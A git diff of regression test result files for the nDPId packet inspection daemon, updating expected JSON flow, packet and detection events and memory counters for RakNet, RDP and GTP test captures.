-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048361,"flow_last_seen":946713048365,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60022,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048554,"flow_last_seen":946713048601,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32953,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048402,"flow_last_seen":946713048422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60025,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713124625,"flow_last_seen":946713244627,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":59935,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713048606,"flow_last_seen":946713048606,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60690,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713064624,"flow_last_seen":946713064624,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048610,"flow_last_seen":946713048623,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60005,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946713048252,"flow_last_seen":946713048361,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32951,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048389,"flow_last_seen":946713048392,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32952,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048361,"flow_last_seen":946713048365,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60022,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048554,"flow_last_seen":946713048601,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32953,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048402,"flow_last_seen":946713048422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60025,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713304628,"flow_last_seen":946713304628,"flow_idle_time":200000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":43582,"dst_port":44501,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946713304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":946713304628,"pkt":"YDjgxTWgeJS0JASgCABFAACKI+hAADcRpAiUmSPNwKgCZKo+rdUAdsFUhAAAAGADAAAAAAAAAAAQBKVFe3qt1QBdBPUP8\/vqfgRrZtwy6n4E\/\/\/\/\/wAABP\/\/\/\/8AAAT\/\/\/\/\/AAAE\/\/\/\/\/wAABP\/\/\/\/8AAAT\/\/\/\/\/AAAE\/\/\/\/\/wAABP\/\/\/\/8AAAAAAAAAAC74AAAAEwwKWtY="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713304628,"flow_last_seen":946713304628,"flow_idle_time":200000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":43582,"dst_port":44501,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713124625,"flow_last_seen":946713244627,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":59935,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713304628,"flow_last_seen":946713304628,"flow_idle_time":200000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":43582,"dst_port":44501,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713304628,"flow_last_seen":946713304628,"flow_idle_time":200000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":43582,"dst_port":44501,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713124625,"flow_last_seen":946713244627,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":59935,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713304628,"flow_last_seen":946713304628,"flow_idle_time":200000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":43582,"dst_port":44501,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","packets-captured":66,"packets-processed":66,"total-skipped-flows":0,"total-l4-payload-len":6616,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":70,"global_ts_msec":946713304628} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 66/66 @@ -76,9 +76,9 @@ ~~ total active/idle flows...: 12/12 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883017 bytes -~~ total memory freed........: 5883017 bytes -~~ total allocations/frees...: 118224/118224 +~~ total memory allocated....: 6016651 bytes +~~ total memory freed........: 6016651 bytes +~~ total allocations/frees...: 120986/120986 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 458 chars ~~ json string max len.......: 2398 chars diff --git a/test/results/rdp.pcap.out b/test/results/rdp.pcap.out index 7c8c5cf08..680172806 100644 --- a/test/results/rdp.pcap.out +++ b/test/results/rdp.pcap.out @@ -4,8 +4,8 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1559207465138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1559207465138,"pkt":"AgAAAEUAAEAAAEAAQAbIuKwQArnAqAKOzQ4NPfm84lgAAAAAsML\/\/7iqAAACBAT5AQMDBQEBCAoLUEqcAAAAAAQCAAA="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1559207465180,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1559207465180,"pkt":"AgAAAEUAADRflEAAfwYqMMCoAo6sEAK5DT3NDkeav7z5vOJZgBL6AEVOAAACBAW0AQMDAAEBBAI="} 00431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1559207465181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1559207465181,"pkt":"AgAAAEUAACgAAEAAQAbI0KwQArnAqAKOzQ4NPfm84llHmr+9UBAgAGAaAAA="} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1559207465138,"flow_last_seen":1559207465181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1559207465181,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} -00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2010,"flow_first_seen":1559207465138,"flow_last_seen":1559207472692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1273,"flow_tot_l4_payload_len":534243,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1559207472692,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1559207465138,"flow_last_seen":1559207465181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1559207465181,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} +00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2010,"flow_first_seen":1559207465138,"flow_last_seen":1559207472692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1273,"flow_tot_l4_payload_len":534243,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1559207472692,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","packets-captured":2010,"packets-processed":2010,"total-skipped-flows":0,"total-l4-payload-len":534243,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1559207472692} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2010/2010 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5927743 bytes -~~ total memory freed........: 5927743 bytes -~~ total allocations/frees...: 120125/120125 +~~ total memory allocated....: 6061377 bytes +~~ total memory freed........: 6061377 bytes +~~ total allocations/frees...: 122887/122887 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 436 chars ~~ json string max len.......: 820 chars diff --git a/test/results/reasm_crash_anon.pcapng.out b/test/results/reasm_crash_anon.pcapng.out index 31993d5a2..9e5661387 100644 --- a/test/results/reasm_crash_anon.pcapng.out +++ b/test/results/reasm_crash_anon.pcapng.out @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882213 bytes -~~ total memory freed........: 5882213 bytes -~~ total allocations/frees...: 118326/118326 +~~ total memory allocated....: 6011186 bytes +~~ total memory freed........: 6011186 bytes +~~ total allocations/frees...: 121086/121086 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 474 chars ~~ json string max len.......: 657 chars diff --git a/test/results/reasm_segv_anon.pcapng.out b/test/results/reasm_segv_anon.pcapng.out index 1af7cab6a..04f2f8523 100644 --- a/test/results/reasm_segv_anon.pcapng.out +++ b/test/results/reasm_segv_anon.pcapng.out @@ -4,7 +4,7 @@ 00413{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAcxs8EFFy5LtdCABFeABcpb4AAEARUG2RTALsu2A0VQhoCGgASAAAMv8AOAn8kEPKcwAARQAANFkiQAB\/BgGSrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBeCMAAAEBBQo6qnTxOqqFWQ=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1550422828553,"flow_last_seen":1550422828553,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1550422828553,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1550422828553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1550422828553,"pkt":"AAAAcxs8EFFy5LtdCABFeABcpb4AAEARUG2RTALsu2A0VQhoCGgASAAAMv8AOAn8kEPKcwAARQAANFkiQAB\/BgGSrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBeCMAAAEBBQo6qnTxOqqFWQ=="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1550422828553,"flow_last_seen":1550422828553,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1550422828553,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1550422828553,"flow_last_seen":1550422828553,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1550422828553,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 00240{"error_event_id":15,"error_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":2,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422828949} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422828553,"pkt":"AAAAcxs8EFFy5LtdCABFeABcLoEAAEARx6qRTALsu2A0VQhoCGgASAAAMv8AOAn8kEPNcwAARQAANFkkQAB\/BgGQrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBcqsAAAEBBQo6qnTxOqqK0Q=="} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1550422828949,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1550422828949,"pkt":"AAAAcxs8EFFy5LtdCABFeABcLoEAAEARx6qRTALsu2A0VQhoCGgASAAAMv8AOAn8kEPNcwAARQAANFkkQAB\/BgGQrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBcqsAAAEBBQo6qnTxOqqK0Q=="} @@ -61,7 +61,7 @@ 00446{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1550422842802,"pkt":"AAAAcxs8EFFy5LtdCABFeABsdGMAAEARgbiRTALsu2A0VQhoCGgAWAAAMv8ASAn8kEMzdAAARQAARFmCQAB\/BgEirBEkFT++kSvhEwBQ8LOPBjqqtinAEAEB1kkAAAEBBRo6qudhOqryUTqqwRk6qswJOqrRgTqq1vk="} 00241{"error_event_id":15,"error_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":81,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":122,"expected":126,"global_ts_msec":1550422844222} 00446{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1550422842865,"pkt":"AAAAcxs8EFFy5LtdCABFeABsUeoAAEARpDGRTALsu2A0VQhoCGgAWAAAMv8ASAn8kEM8dAAARQAARFmLQAB\/BgEZrBEkFT++kSvhEwBQ8LOPBjqqu6HAEAEB0NEAAAEBBRo6qudhOqryUTqqwRk6qswJOqrRgTqq1vk="} 